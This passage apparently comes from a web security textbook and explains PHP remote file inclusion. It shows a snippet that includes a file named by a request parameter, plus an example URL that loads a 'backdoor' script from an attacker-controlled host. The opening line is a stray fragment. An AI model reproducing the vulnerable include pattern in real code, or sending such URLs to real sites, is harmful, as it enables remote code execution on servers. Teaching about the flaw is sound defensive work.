If the application you are attacking uses PHP, you can use the test string

Consider an application that delivers different content to people in different

locations. When users choose their location, this is communicated to the server

via a request parameter, as follows:

https://wahh-app.com/main.php?Country=US 

The application processes the 

Country

parameter as follows:

$country = $_GET[‘Country’];

include( $country . ‘.php’ );

This causes the execution environment to load the file 

US.php

that is located

on the web server file system. The contents of this file are effectively copied

into the 

main.php

file, and executed.

An attacker can exploit this behavior in different ways, the most serious of

which is to specify an external URL as the location of the include file. The PHP

include function accepts this as input, and the execution environment will

retrieve the specified file and execute its contents. Hence, an attacker can con-

struct a malicious script containing arbitrarily complex content, host this on a

web server he controls, and invoke it for execution via the vulnerable applica-

tion function. For example:

https://wahh-app.com/main.php?Country=http://wahh-attacker.com/backdoor 

Download 5,76 Mb.

Do'stlaringiz bilan baham: